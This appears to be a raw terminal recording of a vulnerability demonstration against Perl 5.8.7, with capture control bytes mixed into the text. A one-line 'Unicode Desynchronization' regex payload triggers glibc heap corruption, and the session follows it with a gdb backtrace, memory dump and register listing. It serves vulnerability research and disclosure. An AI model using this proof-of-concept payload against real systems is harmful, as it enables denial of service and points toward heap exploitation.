G?G4 : user@vapor|0; G?GtpH?GjwH?G dH?G H?G@ /demos/perl H?Gϖ: user@vapor|0; H?G sH?G oH?GT uH?G9 rI?GcI?GeI?G9 I?G.I?G4 .I?G} /K?GqdK?G>eK?G/YmK?G oK?Gs.sh L?G- L?G: demo@vapor|0; N?G;hN?G] aN?G nN?Gv> dle_product O?G O?GG00. Unicode Desynchronization 1 O?GG01. Unicode Desynchronization 2 O?Gselect vulnerability: P?GS0P?G P?G~'Unicode Desynchronization 1 selected. P?G P?G1payload: $r="A".chr(128)x"1024"."\\x{100}";/$r/ P?Gpress enter to run. Q?G  Q?G [1] 30014 Q?G1 E*** glibc detected *** realloc(): invalid next size: 0x08062608 *** Q?G)6 v../demos.sh: line 80: 30016 Aborted (core dumped) /usr/local/encap/perl-5.8.7/bin/perl -e "$payload" Q?GD9 -[1]+ Exit 134 ( eval $cmd ) V?GUg 'Core file generated. Opening gdb ... W?GY IUsing host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". W?G= @ warning: Can't read pathname for load map: Input/output error.W?GT  W?G ZReading symbols from /usr/local/encap/perl-5.8.7/lib/5.8.7/x86_64-linux/CORE/libperl.so...W?G)done. W?G +WLoaded symbols for /usr/local/encap/perl-5.8.7/lib/5.8.7/x86_64-linux/CORE/libperl.so W?G,6Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...W?G&0HReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libnsl-2.3.6.so...W?G2done. W?G 3done. W?G"33Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1 W?G45Reading symbols from /lib/tls/i686/cmov/libdl.so.2...W?G5GReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libdl-2.3.6.so...W?G6done. W?G!7done. W?G772Loaded symbols for /lib/tls/i686/cmov/libdl.so.2 W?GR84Reading symbols from /lib/tls/i686/cmov/libm.so.6...W?G>FReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libm-2.3.6.so...W?GEdone. W?G0Fdone. W?GkF1Loaded symbols for /lib/tls/i686/cmov/libm.so.6 W?GG8Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...W?GHJReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libcrypt-2.3.6.so...W?GIdone. W?GJdone. W?GAJ5Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1 W?G8K7Reading symbols from /lib/tls/i686/cmov/libutil.so.1...W?GLIReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libutil-2.3.6.so...W?GSMdone. W?GMdone. W?GM4Loaded symbols for /lib/tls/i686/cmov/libutil.so.1 W?GN4Reading symbols from /lib/tls/i686/cmov/libc.so.6...W?GtFReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...W?Gdone. W?G 8done. Loaded symbols for /lib/tls/i686/cmov/libc.so.6 W?G*Reading symbols from /lib/ld-linux.so.2...W?G[6Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...W?Gdone. W?Gndone. W?G'Loaded symbols for /lib/ld-linux.so.2 W?GiCore was generated by `/usr/local/encap/perl-5.8.7/bin/perl -e $r="A".chr(128)x"1024"."\\x{100}";/$r/'. W?G\,Program terminated with signal 6, Aborted. W?GZ(#0 0xffffe402 in __kernel_vsyscall () W?G >>Y?GbY?GtY?G9 Y?G1:(#0 0xffffe402 in __kernel_vsyscall () Y?G ;>#1 0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6 Y?G`;>#2 0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6 Y?G;G#3 0x43b7187a in __libc_message () from /lib/tls/i686/cmov/libc.so.6 Y?G<E#4 0x43b79c22 in _int_realloc () from /lib/tls/i686/cmov/libc.so.6 Y?GU<@#5 0x43b7aae6 in realloc () from /lib/tls/i686/cmov/libc.so.6 Y?G~S#6 0xf7f4f821 in Perl_safesysrealloc (where=0x8062608, size=0x423) at util.c:124 Y?GEJ#7 0xf7f6b995 in Perl_sv_grow (sv=0x804cc60, newlen=0x423) at sv.c:1620 Y?Gr9#8 0xf7f7333d in Perl_sv_catpvn_flags (dsv=0x804cc60, Y?GD sstr=0x806191c "\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\200\200\200\205!#", slen=0x85, flags=0x0) at sv.c:4376 Y?G#9 0xf7f41f20 in S_study_chunk (pRExC_state=0xffffd06c, scanp=0xffffd134, deltap=0xffffd128, last=0x8061980, data=0xffffd0b4, flags=0x2400) at regcomp.c:936 Y?G#10 0xf7f475e2 in Perl_pregcomp (exp=0x80610f8 "A", '\200' ..., xend=0x8061500 "", pm=0x8054610) at regcomp.c:1969 Y?GD6#11 0xf7f8a9ec in Perl_pp_regcomp () at pp_ctl.c:127 Y?G7#12 0xf7f4d4cc in Perl_runops_debug () at dump.c:1452 Y?Gٿ?#13 0xf7f045af in perl_run (my_perl=0x804c008) at perl.c:2000 Y?GN#14 0x080491e2 in main (argc=0x0, argv=0x0, env=0xffffd3a4) at perlmain.c:98 Y?G>>[?G>u[?Gtv p[?G  ]?G6^?G  ^?G3 S#6 0xf7f4f821 in Perl_safesysrealloc (where=0x8062608, size=0x423) at util.c:124 ^?G:6124 ptr = (Malloc_t)PerlMem_realloc(where,size); ^?G>>_?GL p_?G  `?G+=*b?G 9wb?GX hb?G#R eb?G rb?G\Yec?GrI c?GJ+Attempt to dereference a generic pointer. c?GJK>>e?G@ue?GOy pe?GL  e?G k#7 0xf7f6b995 in Perl_sv_grow (sv=0x804cc60, newlen=0x423) at sv.c:1620 1620 Renew(s,newlen,char); e?G+ >>g?Gpg?Ge g?G8sg?Gh g?Gw$1 = 0x8062608 "A\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203\200\203"... g?G>>j?Gik?Gsnk?Gfk?G:ok?G/ k?GHrk?Gek?G@ gk?G  k?GE eax 0x0 0x0 ecx 0x7540 0x7540 edx 0x6 0x6 ebx 0xf7fedd2c 0xf7fedd2c esp 0xffffcdb0 0xffffcdb0 ebp 0xffffcdc8 0xffffcdc8 esi 0x8062608 0x8062608 edi 0x423 0x423 eip 0xf7f6b995 0xf7f6b995 eflags 0x10246 [ PF ZF IF RF ] cs 0x23 0x23 ss 0x2b 0x2b ds 0x2b 0x2b es 0x2b 0x2b fs 0x0 0x0 gs 0x63 0x63 k?G >>n?Gquit n?G: demo@vapor|0; o?Gexit